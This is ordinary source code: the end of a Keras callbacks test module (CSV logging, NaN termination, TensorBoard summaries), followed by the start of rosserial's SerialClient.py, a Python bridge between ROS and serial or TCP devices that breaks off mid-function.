assert os.path.exists(filepath)
with open(filepath) as csvfile:
dialect = csv.Sniffer().sniff(csvfile.read())
assert dialect.delimiter == sep
del model
del cbks
# case 2, append data to existing file, skip header
model = make_model()
cbks = [keras.callbacks.CSVLogger(filepath, separator=sep, append=True)]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=1,
verbose=0)
# case 3, reuse of CSVLogger object
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=2,
verbose=0)
with open(filepath) as csvfile:
list_lines = csvfile.readlines()
for line in list_lines:
assert line.count(sep) == 4
assert len(list_lines) == 5
output = ' '.join(list_lines)
assert len(re.findall('epoch', output)) == 1
os.remove(filepath)
def test_stop_training_csv(self):
# Test that using the CSVLogger callback with the TerminateOnNaN callback
# does not result in invalid CSVs.
np.random.seed(1337)
tmpdir = self.get_temp_dir()
self.addCleanup(shutil.rmtree, tmpdir, ignore_errors=True)
with self.cached_session():
fp = os.path.join(tmpdir, 'test.csv')
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = keras.utils.to_categorical(y_test)
y_train = keras.utils.to_categorical(y_train)
cbks = [keras.callbacks.TerminateOnNaN(), keras.callbacks.CSVLogger(fp)]
model = keras.models.Sequential()
for _ in range(5):
model.add(keras.layers.Dense(2, input_dim=INPUT_DIM, activation='relu'))
model.add(keras.layers.Dense(NUM_CLASSES, activation='linear'))
model.compile(loss='mean_squared_error',
optimizer='rmsprop')
def data_generator():
i = 0
max_batch_index = len(x_train) // BATCH_SIZE
tot = 0
while 1:
if tot > 3 * len(x_train):
yield (np.ones([BATCH_SIZE, INPUT_DIM]) * np.nan,
np.ones([BATCH_SIZE, NUM_CLASSES]) * np.nan)
else:
yield (x_train[i * BATCH_SIZE: (i + 1) * BATCH_SIZE],
y_train[i * BATCH_SIZE: (i + 1) * BATCH_SIZE])
i += 1
tot += 1
i %= max_batch_index
history = model.fit_generator(data_generator(),
len(x_train) // BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=20)
loss = history.history['loss']
assert len(loss) > 1
assert loss[-1] == np.inf or np.isnan(loss[-1])
values = []
with open(fp) as f:
for x in csv.reader(f):
# On Windows, due to \r\n line endings we may end up reading empty lines
# after each line. Skip empty lines.
if x:
values.append(x)
assert 'nan' in values[-1], 'The last epoch was not logged.'
def test_TerminateOnNaN(self):
with self.cached_session():
np.random.seed(1337)
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = keras.utils.to_categorical(y_test)
y_train = keras.utils.to_categorical(y_train)
cbks = [keras.callbacks.TerminateOnNaN()]
model = keras.models.Sequential()
initializer = keras.initializers.Constant(value=1e5)
for _ in range(5):
model.add(
keras.layers.Dense(
2,
input_dim=INPUT_DIM,
activation='relu',
kernel_initializer=initializer))
model.add(keras.layers.Dense(NUM_CLASSES))
model.compile(loss='mean_squared_error', optimizer='rmsprop')
history = model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=20)
loss = history.history['loss']
self.assertEqual(len(loss), 1)
self.assertEqual(loss[0], np.inf)
@unittest.skipIf(
os.name == 'nt',
'use_multiprocessing=True does not work on windows properly.')
def test_LambdaCallback(self):
with self.cached_session():
np.random.seed(1337)
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = keras.utils.to_categorical(y_test)
y_train = keras.utils.to_categorical(y_train)
model = keras.models.Sequential()
model.add(
keras.layers.Dense(
NUM_HIDDEN, input_dim=INPUT_DIM, activation='relu'))
model.add(keras.layers.Dense(NUM_CLASSES, activation='softmax'))
model.compile(
loss='categorical_crossentropy',
optimizer='sgd',
metrics=['accuracy'])
# Start an arbitrary process that should run during model
# training and be terminated after training has completed.
e = threading.Event()
def target():
e.wait()
t = threading.Thread(target=target)
t.start()
cleanup_callback = keras.callbacks.LambdaCallback(
on_train_end=lambda logs: e.set())
cbks = [cleanup_callback]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=5,
verbose=0)
t.join()
assert not t.is_alive()
def test_RemoteMonitorWithJsonPayload(self):
if requests is None:
self.skipTest('`requests` required to run this test')
with self.cached_session():
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = keras.utils.np_utils.to_categorical(y_test)
y_train = keras.utils.np_utils.to_categorical(y_train)
model = keras.models.Sequential()
model.add(
keras.layers.Dense(
NUM_HIDDEN, input_dim=INPUT_DIM, activation='relu'))
model.add(keras.layers.Dense(NUM_CLASSES, activation='softmax'))
model.compile(
loss='categorical_crossentropy',
optimizer='rmsprop',
metrics=['accuracy'])
cbks = [keras.callbacks.RemoteMonitor(send_as_json=True)]
with test.mock.patch.object(requests, 'post'):
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=1)
# A summary that was emitted during a test. Fields:
# logdir: str. The logdir of the FileWriter to which the summary was
# written.
# tag: str. The name of the summary.
_ObservedSummary = collections.namedtuple('_ObservedSummary', ('logdir', 'tag'))
class _SummaryFile(object):
"""A record of summary tags and the files to which they were written.
Fields `scalars`, `images`, `histograms`, and `tensors` are sets
containing `_ObservedSummary` values.
"""
def __init__(self):
self.scalars = set()
self.images = set()
self.histograms = set()
self.tensors = set()
def list_summaries(logdir):
"""Read all summaries under the logdir into a `_SummaryFile`.
Args:
logdir: A path to a directory that contains zero or more event
files, either as direct children or in transitive subdirectories.
Summaries in these events must only contain old-style scalars,
images, and histograms. Non-summary events, like `graph_def`s, are
ignored.
Returns:
A `_SummaryFile` object reflecting all summaries written to any
event files in the logdir or any of its descendant directories.
Raises:
ValueError: If an event file contains a summary of an unexpected kind.
"""
result = _SummaryFile()
for (dirpath, dirnames, filenames) in os.walk(logdir):
del dirnames # unused
for filename in filenames:
if not filename.startswith('events.out.'):
continue
path = os.path.join(dirpath, filename)
for event in summary_iterator.summary_iterator(path):
if not event.summary: # (e.g., it's a `graph_def` event)
continue
for value in event.summary.value:
tag = value.tag
# Case on the `value` rather than the summary metadata because
# the Keras callback uses `summary_ops_v2` to emit old-style
# summaries. See b/124535134.
kind = value.WhichOneof('value')
container = {
'simple_value': result.scalars,
'image': result.images,
'histo': result.histograms,
'tensor': result.tensors,
}.get(kind)
if container is None:
raise ValueError(
'Unexpected summary kind %r in event file %s:\n%r'
% (kind, path, event))
container.add(_ObservedSummary(logdir=dirpath, tag=tag))
return result
@keras_parameterized.run_with_all_model_types
@keras_parameterized.run_all_keras_modes(always_skip_v1=True)
class TestTensorBoardV2(keras_parameterized.TestCase):
def setUp(self):
super(TestTensorBoardV2, self).setUp()
self.logdir = os.path.join(self.get_temp_dir(), 'tb')
self.train_dir = os.path.join(self.logdir, 'train')
self.validation_dir = os.path.join(self.logdir, 'validation')
def _get_model(self):
layers = [
keras.layers.Conv2D(8, (3, 3)),
keras.layers.Flatten(),
keras.layers.Dense(1)
]
model = testing_utils.get_model_from_layers(layers, input_shape=(10, 10, 1))
model.compile('sgd', 'mse', run_eagerly=testing_utils.should_run_eagerly())
return model
def test_TensorBoard_default_logdir(self):
"""Regression test for cross-platform pathsep in default logdir."""
os.chdir(self.get_temp_dir())
model = self._get_model()
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
tb_cbk = keras.callbacks.TensorBoard() # no logdir specified
model.fit(
x,
y,
batch_size=2,
epochs=2,
validation_data=(x, y),
callbacks=[tb_cbk])
summary_file = list_summaries(logdir='.')
train_dir = os.path.join('.', 'logs', 'train')
validation_dir = os.path.join('.', 'logs', 'validation')
self.assertEqual(
summary_file.scalars, {
_ObservedSummary(logdir=train_dir, tag='epoch_loss'),
_ObservedSummary(logdir=validation_dir, tag='epoch_loss'),
})
def test_TensorBoard_basic(self):
model = self._get_model()
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
tb_cbk = keras.callbacks.TensorBoard(self.logdir)
model.fit(
x,
y,
batch_size=2,
epochs=2,
validation_data=(x, y),
callbacks=[tb_cbk])
summary_file = list_summaries(self.logdir)
self.assertEqual(
summary_file.scalars, {
_ObservedSummary(logdir=self.train_dir, tag='epoch_loss'),
_ObservedSummary(logdir=self.validation_dir, tag='epoch_loss'),
})
def test_TensorBoard_across_invocations(self):
"""Regression test for summary writer resource use-after-free.
See: <https://github.com/tensorflow/tensorflow/issues/25707>
"""
model = self._get_model()
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
tb_cbk = keras.callbacks.TensorBoard(self.logdir)
for _ in (1, 2):
model.fit(
x,
y,
batch_size=2,
epochs=2,
validation_data=(x, y),
callbacks=[tb_cbk])
summary_file = list_summaries(self.logdir)
self.assertEqual(
summary_file.scalars, {
_ObservedSummary(logdir=self.train_dir, tag='epoch_loss'),
_ObservedSummary(logdir=self.validation_dir, tag='epoch_loss'),
})
def test_TensorBoard_no_spurious_event_files(self):
model = self._get_model()
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
tb_cbk = keras.callbacks.TensorBoard(self.logdir)
model.fit(
x,
y,
batch_size=2,
epochs=2,
callbacks=[tb_cbk])
events_file_run_basenames = set()
for (dirpath, dirnames, filenames) in os.walk(self.logdir):
del dirnames # unused
if any(fn.startswith('events.out.') for fn in filenames):
events_file_run_basenames.add(os.path.basename(dirpath))
self.assertEqual(events_file_run_basenames, {'train'})
def test_TensorBoard_batch_metrics(self):
model = self._get_model()
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
tb_cbk = keras.callbacks.TensorBoard(self.logdir, update_freq=1)
model.fit(
x,
y,
batch_size=2,
epochs=2,
validation_data=(x, y),
callbacks=[tb_cbk])
summary_file = list_summaries(self.logdir)
self.assertEqual(
summary_file.scalars,
{
_ObservedSummary(logdir=self.train_dir, tag='batch_loss'),
_ObservedSummary(logdir=self.train_dir, tag='epoch_loss'),
_ObservedSummary(logdir=self.validation_dir, tag='epoch_loss'),
},
)
def test_TensorBoard_weight_histograms(self):
model = self._get_model()
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
tb_cbk = keras.callbacks.TensorBoard(self.logdir, histogram_freq=1)
model_type = testing_utils.get_model_type()
model.fit(
x,
y,
batch_size=2,
epochs=2,
validation_data=(x, y),
callbacks=[tb_cbk])
summary_file = list_summaries(self.logdir)
self.assertEqual(
summary_file.scalars,
{
_ObservedSummary(logdir=self.train_dir, tag='epoch_loss'),
_ObservedSummary(logdir=self.validation_dir, tag='epoch_loss'),
},
)
self.assertEqual(
self._strip_layer_names(summary_file.histograms, model_type),
{
_ObservedSummary(logdir=self.train_dir, tag='bias_0'),
_ObservedSummary(logdir=self.train_dir, tag='kernel_0'),
},
)
def test_TensorBoard_weight_images(self):
model = self._get_model()
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
tb_cbk = keras.callbacks.TensorBoard(
self.logdir, histogram_freq=1, write_images=True)
model_type = testing_utils.get_model_type()
model.fit(
x,
y,
batch_size=2,
epochs=2,
validation_data=(x, y),
callbacks=[tb_cbk])
summary_file = list_summaries(self.logdir)
self.assertEqual(
summary_file.scalars,
{
_ObservedSummary(logdir=self.train_dir, tag='epoch_loss'),
_ObservedSummary(logdir=self.validation_dir, tag='epoch_loss'),
},
)
self.assertEqual(
self._strip_layer_names(summary_file.histograms, model_type),
{
_ObservedSummary(logdir=self.train_dir, tag='bias_0'),
_ObservedSummary(logdir=self.train_dir, tag='kernel_0'),
},
)
self.assertEqual(
self._strip_layer_names(summary_file.images, model_type),
{
_ObservedSummary(logdir=self.train_dir, tag='bias_0/image/0'),
_ObservedSummary(logdir=self.train_dir, tag='kernel_0/image/0'),
_ObservedSummary(logdir=self.train_dir, tag='kernel_0/image/1'),
_ObservedSummary(logdir=self.train_dir, tag='kernel_0/image/2'),
},
)
def _strip_layer_names(self, summaries, model_type):
"""Deduplicate summary names modulo layer prefix.
This removes the first slash-component of each tag name: for
instance, "foo/bar/baz" becomes "bar/baz".
Args:
summaries: A `set` of `_ObservedSummary` values.
model_type: The model type currently being tested.
Returns:
A new `set` of `_ObservedSummary` values with layer prefixes
removed.
"""
result = set()
for summary in summaries:
if '/' not in summary.tag:
raise ValueError('tag has no layer name: %r' % summary.tag)
start_from = 2 if 'subclass' in model_type else 1
new_tag = '/'.join(summary.tag.split('/')[start_from:])
result.add(summary._replace(tag=new_tag))
return result
def test_TensorBoard_invalid_argument(self):
with self.assertRaisesRegexp(ValueError, 'Unrecognized arguments'):
keras.callbacks.TensorBoard(wwrite_images=True)
# Note that this test specifies model_type explicitly.
@keras_parameterized.run_all_keras_modes(always_skip_v1=True)
class TestTensorBoardV2NonParameterizedTest(keras_parameterized.TestCase):
def setUp(self):
super(TestTensorBoardV2NonParameterizedTest, self).setUp()
self.logdir = os.path.join(self.get_temp_dir(), 'tb')
self.train_dir = os.path.join(self.logdir, 'train')
self.validation_dir = os.path.join(self.logdir, 'validation')
def _get_seq_model(self):
model = keras.models.Sequential([
keras.layers.Conv2D(8, (3, 3), input_shape=(10, 10, 1)),
keras.layers.Flatten(),
keras.layers.Dense(1),
])
model.compile('sgd', 'mse', run_eagerly=testing_utils.should_run_eagerly())
return model
def fitModelAndAssertKerasModelWritten(self, model):
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
tb_cbk = keras.callbacks.TensorBoard(self.logdir,
write_graph=True,
profile_batch=0)
model.fit(
x,
y,
batch_size=2,
epochs=2,
validation_data=(x, y),
callbacks=[tb_cbk])
summary_file = list_summaries(self.logdir)
self.assertEqual(
summary_file.tensors,
{
_ObservedSummary(logdir=self.train_dir, tag='keras'),
},
)
def test_TensorBoard_writeSequentialModel_noInputShape(self):
model = keras.models.Sequential([
keras.layers.Conv2D(8, (3, 3)),
keras.layers.Flatten(),
keras.layers.Dense(1),
])
model.compile('sgd', 'mse', run_eagerly=False)
self.fitModelAndAssertKerasModelWritten(model)
def test_TensorBoard_writeSequentialModel_withInputShape(self):
model = keras.models.Sequential([
keras.layers.Conv2D(8, (3, 3), input_shape=(10, 10, 1)),
keras.layers.Flatten(),
keras.layers.Dense(1),
])
model.compile('sgd', 'mse', run_eagerly=False)
self.fitModelAndAssertKerasModelWritten(model)
def test_TensorBoard_writeModel(self):
inputs = keras.layers.Input([10, 10, 1])
x = keras.layers.Conv2D(8, (3, 3), activation='relu')(inputs)
x = keras.layers.Flatten()(x)
x = keras.layers.Dense(1)(x)
model = keras.models.Model(inputs=inputs, outputs=[x])
model.compile('sgd', 'mse', run_eagerly=False)
self.fitModelAndAssertKerasModelWritten(model)
def test_TensorBoard_autoTrace(self):
model = self._get_seq_model()
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
tb_cbk = keras.callbacks.TensorBoard(
self.logdir, histogram_freq=1, profile_batch=1, write_graph=False)
model.fit(
x,
y,
batch_size=2,
epochs=2,
validation_data=(x, y),
callbacks=[tb_cbk])
summary_file = list_summaries(self.logdir)
self.assertEqual(
summary_file.tensors,
{
_ObservedSummary(logdir=self.train_dir, tag=u'batch_1'),
},
)
def test_TensorBoard_autoTrace_tagNameWithBatchNum(self):
model = self._get_seq_model()
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
tb_cbk = keras.callbacks.TensorBoard(
self.logdir, histogram_freq=1, profile_batch=2, write_graph=False)
model.fit(
x,
y,
batch_size=2,
epochs=2,
validation_data=(x, y),
callbacks=[tb_cbk])
summary_file = list_summaries(self.logdir)
self.assertEqual(
summary_file.tensors,
{
_ObservedSummary(logdir=self.train_dir, tag=u'batch_2'),
},
)
def test_TensorBoard_autoTrace_profile_batch_largerThanBatchCount(self):
model = self._get_seq_model()
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
tb_cbk = keras.callbacks.TensorBoard(
self.logdir, histogram_freq=1, profile_batch=10000, write_graph=False)
model.fit(
x,
y,
batch_size=2,
epochs=2,
validation_data=(x, y),
callbacks=[tb_cbk])
summary_file = list_summaries(self.logdir)
# Enabled trace only on the 10000th batch, thus it should be empty.
self.assertEmpty(summary_file.tensors)
if __name__ == '__main__':
test.main()
|
SerialClient.py
|
#!/usr/bin/env python
#####################################################################
# Software License Agreement (BSD License)
#
# Copyright (c) 2011, Willow Garage, Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
# * Neither the name of Willow Garage, Inc. nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
__author__ = "mferguson@willowgarage.com (Michael Ferguson)"
import roslib
import rospy
import imp
import thread
import multiprocessing
import sys
import errno
from serial import *
import StringIO
from std_msgs.msg import Time
from rosserial_msgs.msg import *
from rosserial_msgs.srv import *
import diagnostic_msgs.msg
import socket
import time
import struct
import signal
def load_pkg_module(package, directory):
# check if it's in the Python path
path = sys.path
try:
imp.find_module(package)
except:
roslib.load_manifest(package)
try:
m = __import__( package + '.' + directory )
except:
rospy.logerr( "Cannot import package : %s"% package )
rospy.logerr( "sys.path was " + str(path) )
return None
return m
def load_message(package, message):
m = load_pkg_module(package, 'msg')
m2 = getattr(m, 'msg')
return getattr(m2, message)
def load_service(package,service):
s = load_pkg_module(package, 'srv')
s = getattr(s, 'srv')
srv = getattr(s, service)
mreq = getattr(s, service+"Request")
mres = getattr(s, service+"Response")
return srv,mreq,mres
class Publisher:
"""
Publisher forwards messages from the serial device to ROS.
"""
def __init__(self, topic_info):
""" Create a new publisher. """
self.topic = topic_info.topic_name
# find message type
package, message = topic_info.message_type.split('/')
self.message = load_message(package, message)
if self.message._md5sum == topic_info.md5sum:
self.publisher = rospy.Publisher(self.topic, self.message, queue_size=10)
else:
raise Exception('Checksum does not match: ' + self.message._md5sum + ',' + topic_info.md5sum)
def handlePacket(self, data):
""" Forward message to ROS network. """
m = self.message()
m.deserialize(data)
self.publisher.publish(m)
class Subscriber:
"""
Subscriber forwards messages from ROS to the serial device.
"""
def __init__(self, topic_info, parent):
self.topic = topic_info.topic_name
self.id = topic_info.topic_id
self.parent = parent
# find message type
package, message = topic_info.message_type.split('/')
self.message = load_message(package, message)
if self.message._md5sum == topic_info.md5sum:
self.subscriber = rospy.Subscriber(self.topic, self.message, self.callback)
else:
raise Exception('Checksum does not match: ' + self.message._md5sum + ',' + topic_info.md5sum)
def unregister(self):
rospy.loginfo("Removing subscriber: %s", self.topic)
self.subscriber.unregister()
def callback(self, msg):
""" Forward message to serial device. """
data_buffer = StringIO.StringIO()
msg.serialize(data_buffer)
self.parent.send(self.id, data_buffer.getvalue())
class ServiceServer:
"""
ServiceServer responds to requests from ROS.
"""
def __init__(self, topic_info, parent):
self.topic = topic_info.topic_name
self.parent = parent
# find message type
package, service = topic_info.message_type.split('/')
s = load_pkg_module(package, 'srv')
s = getattr(s, 'srv')
self.mreq = getattr(s, service+"Request")
self.mres = getattr(s, service+"Response")
srv = getattr(s, service)
self.service = rospy.Service(self.topic, srv, self.callback)
# response message
self.data = None
def unregister(self):
rospy.loginfo("Removing service: %s", self.topic)
self.service.shutdown()
def callback(self, req):
""" Forward request to serial device. """
data_buffer = StringIO.StringIO()
req.serialize(data_buffer)
self.response = None
if self.parent.send(self.id, data_buffer.getvalue()) >= 0:
while self.response == None:
pass
return self.response
def handlePacket(self, data):
""" Forward response to ROS network. """
r = self.mres()
r.deserialize(data)
self.response = r
class ServiceClient:
"""
ServiceClient forwards service requests from the serial device to the ROS network.
"""
def __init__(self, topic_info, parent):
self.topic = topic_info.topic_name
self.parent = parent
# find message type
package, service = topic_info.message_type.split('/')
s = load_pkg_module(package, 'srv')
s = getattr(s, 'srv')
self.mreq = getattr(s, service+"Request")
self.mres = getattr(s, service+"Response")
srv = getattr(s, service)
rospy.loginfo("Starting service client, waiting for service '" + self.topic + "'")
rospy.wait_for_service(self.topic)
self.proxy = rospy.ServiceProxy(self.topic, srv)
def handlePacket(self, data):
""" Forward request to ROS network. """
req = self.mreq()
req.deserialize(data)
# call service proxy
resp = self.proxy(req)
# serialize and publish
data_buffer = StringIO.StringIO()
resp.serialize(data_buffer)
self.parent.send(self.id, data_buffer.getvalue())
class RosSerialServer:
"""
RosSerialServer waits for a socket connection then passes itself, forked as a
new process, to SerialClient which uses it as a serial port. It continues to listen
for additional connections. Each forked process is a new ros node, and proxies ros
operations (e.g. publish/subscribe) from its connection to the rest of ros.
"""
def __init__(self, tcp_portnum, fork_server=False):
print "Fork_server is: ", fork_server
self.tcp_portnum = tcp_portnum
self.fork_server = fork_server
def listen(self):
self.serversocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
#bind the socket to a public host, and a well-known port
self.serversocket.bind(("", self.tcp_portnum)) #become a server socket
self.serversocket.listen(1)
while True:
#accept connections
print "waiting for socket connection"
(clientsocket, address) = self.serversocket.accept()
#now do something with the clientsocket
rospy.loginfo("Established a socket connection from %s on port %s" % (address))
self.socket = clientsocket
self.isConnected = True
if (self.fork_server == True): # if configured to launch server in a separate process
rospy.loginfo("Forking a socket server process")
process = multiprocessing.Process(target=self.startSocketServer, args=(address))
process.daemon = True
process.start()
rospy.loginfo("launched startSocketServer")
else:
rospy.loginfo("calling startSerialClient")
self.startSerialClient()
rospy.loginfo("startSerialClient() exited")
def startSerialClient(self):
client = SerialClient(self)
try:
client.run()
except KeyboardInterrupt:
pass
except RuntimeError:
rospy.loginfo("RuntimeError exception caught")
self.isConnected = False
except socket.error:
rospy.loginfo("socket.error exception caught")
self.isConnected = False
finally:
self.socket.close()
for sub in client.subscribers.values():
sub.unregister()
for srv in client.services.values():
srv.unregister()
#pass
def startSocketServer(self, port, address):
rospy.loginfo("starting ROS Serial Python Node serial_node-%r" % (address,))
rospy.init_node("serial_node_%r" % (address,))
self.startSerialClient()
def flushInput(self):
pass
def write(self, data):
if (self.isConnected == False):
return
length = len(data)
totalsent = 0
while totalsent < length:
sent = self.socket.send(data[totalsent:])
if sent == 0:
raise RuntimeError("RosSerialServer.write() socket connection broken")
totalsent = totalsent + sent
def read(self, rqsted_length):
self.msg = ''
if (self.isConnected == False):
return self.msg
while len(self.msg) < rqsted_length:
chunk = self.socket.recv(rqsted_length - len(self.msg))
if chunk == '':
raise RuntimeError("RosSerialServer.read() socket connection broken")
self.msg = self.msg + chunk
return self.msg
def close(self):
self.port.close()
def inWaiting(self):
try: # the caller checks just for <1, so we'll peek at just one byte
chunk = self.socket.recv(1, socket.MSG_DONTWAIT|socket.MSG_PEEK)
if chunk == '':
raise RuntimeError("RosSerialServer.inWaiting() socket connection broken")
return len(chunk)
except socket.error, e:
if e.args[0] == errno.EWOULDBLOCK:
return 0
raise
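# A minimal usage sketch for RosSerialServer (not part of the upstream file;
# the port number and node setup below are illustrative assumptions):
#
#   rospy.init_node("serial_node")
#   server = RosSerialServer(tcp_portnum=11411, fork_server=True)
#   server.listen()   # blocks, handing each accepted TCP client to SerialClient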
class SerialClient:
"""
SerialClient manages the serial connection: it negotiates topics with the device and forwards messages between the serial device and ROS.
"""
def __init__(self, port=None, baud=57600, timeout=5.0):
""" Initialize node, connect to bus, attempt to negotiate topics. """
self.mutex = thread.allocate_lock()
self.lastsync = rospy.Time(0)
self.lastsync_lost = rospy.Time(0)
self.timeout = timeout
self.synced = False
self.pub_diagnostics = rospy.Publisher('/diagnostics', diagnostic_msgs.msg.DiagnosticArray, queue_size=10)
if port== None:
# no port specified, listen for any new port?
pass
elif hasattr(port, 'read'):
# assume it's a file-like object
self.port=port
else:
# open a specific port
try:
self.port = Serial(port, baud, timeout=self.timeout*0.5)
except SerialException as e:
rospy.logerr("Error opening serial: %s", e)
rospy.signal_shutdown("Error opening serial: %s" % e)
raise SystemExit
self.port.timeout = 0.01 # Edit the port timeout
time.sleep(0.1) # Wait for ready (patch for Uno)
# hydro introduces protocol ver2 which must match node_handle.h
# The protocol version is sent as the 2nd sync byte emitted by each end
self.protocol_ver1 = '\xff'
self.protocol_ver2 = '\xfe'
self.protocol_ver = self.protocol_ver2
self.publishers = dict() # id:Publishers
self.subscribers = dict() # topic:Subscriber
self.services = dict() # topic:Service
self.buffer_out = -1
self.buffer_in = -1
self.callbacks = dict()
# endpoints for creating new pubs/subs
self.callbacks[TopicInfo.ID_PUBLISHER] = self.setupPublisher
self.callbacks[TopicInfo.ID_SUBSCRIBER] = self.setupSubscriber
# service client/servers have 2 creation endpoints (a publisher and a subscriber)
self.callbacks[TopicInfo.ID_SERVICE_SERVER+TopicInfo.ID_PUBLISHER] = self.setupServiceServerPublisher
self.callbacks[TopicInfo.ID_SERVICE_SERVER+TopicInfo.ID_SUBSCRIBER] = self.setupServiceServerSubscriber
self.callbacks[TopicInfo.ID_SERVICE_CLIENT+TopicInfo.ID_PUBLISHER] = self.setupServiceClientPublisher
self.callbacks[TopicInfo.ID_SERVICE_CLIENT+TopicInfo.ID_SUBSCRIBER] = self.setupServiceClientSubscriber
# custom endpoints
self.callbacks[TopicInfo.ID_PARAMETER_REQUEST] = self.handleParameterRequest
self.callbacks[TopicInfo.ID_LOG] = self.handleLoggingRequest
self.callbacks[TopicInfo.ID_TIME] = self.handleTimeRequest
rospy.sleep(2.0) # TODO
self.requestTopics()
self.lastsync = rospy.Time.now()
signal.signal(signal.SIGINT, self.txStopRequest)
def requestTopics(self):
""" Determine topics to subscribe/publish. """
self.port.flushInput()
# request topic sync
self.port.write("\xff" + self.protocol_ver + "\x00\x00\xff\x00\x00\xff")
def txStopRequest(self, signal, frame):
""" send stop tx request to arduino when receive SIGINT(Ctrl-c)"""
self.port.flushInput()
self.port.write("\xff" + self.protocol_ver + "\x00\x00\xff\x0b\x00\xf4")
# tx_stop_request is x0b
rospy.loginfo("Send tx stop request")
sys.exit(0)
def tryRead(self, length):
try:
bytes_read = self.port.read(length)
if len(bytes_read) < length:
rospy.logwarn("Serial Port read returned short (expected %d bytes, received %d instead)."
% (length, len(bytes_read)))
raise IOError()
return bytes_read
except Exception as e:
rospy.logwarn("Serial Port read failure: %s", e)
raise IOError()
def run(self):
""" Forward recieved messages to appropriate publisher. """
data = ''
while not rospy.is_shutdown():
if (rospy.Time.now() - self.lastsync).to_sec() > (self.timeout * 3):
if (self.synced == True):
rospy.logerr("Lost sync with device, restarting...")
else:
rospy.logerr("Unable to sync with device; possible link problem or link software version mismatch such as hydro rosserial_python with groovy Arduino")
self.lastsync_lost = rospy.Time.now()
self.sendDiagnostics(diagnostic_msgs.msg.DiagnosticStatus.ERROR, "no sync with device")
self.requestTopics()
self.lastsync = rospy.Time.now()
# This try-block is here because we make multiple calls to read(). Any one of them can throw
# an IOError if there's a serial problem or timeout. In that scenario, a single handler at the
# bottom attempts to reconfigure the topics.
try:
if self.port.inWaiting() < 1:
time.sleep(0.001)
continue
flag = [0,0]
flag[0] = self.tryRead(1)
if (flag[0] != '\xff'):
continue
flag[1] = self.tryRead(1)
if ( flag[1] != self.protocol_ver):
self.sendDiagnostics(diagnostic_msgs.msg.DiagnosticStatus.ERROR, "Mismatched protocol version in packet: lost sync or rosserial_python is from different ros release than the rosserial client")
rospy.logerr("Mismatched protocol version in packet: lost sync or rosserial_python is from different ros release than the rosserial client")
protocol_ver_msgs = {'\xff': 'Rev 0 (rosserial 0.4 and earlier)', '\xfe': 'Rev 1 (rosserial 0.5+)', '\xfd': 'Some future rosserial version'}
if (flag[1] in protocol_ver_msgs):
found_ver_msg = 'Protocol version of client is ' + protocol_ver_msgs[flag[1]]
else:
found_ver_msg = "Protocol version of client is unrecognized"
rospy.loginfo("%s, expected %s" % (found_ver_msg, protocol_ver_msgs[self.protocol_ver]))
continue
msg_len_bytes = self.tryRead(2)
msg_length, = struct.unpack("<h", msg_len_bytes)
msg_len_chk = self.tryRead(1)
msg_len_checksum = sum(map(ord, msg_len_bytes)) + ord(msg_len_chk)
if msg_len_checksum % 256 != 255:
rospy.loginfo("wrong checksum for msg length, length %d" %(msg_length))
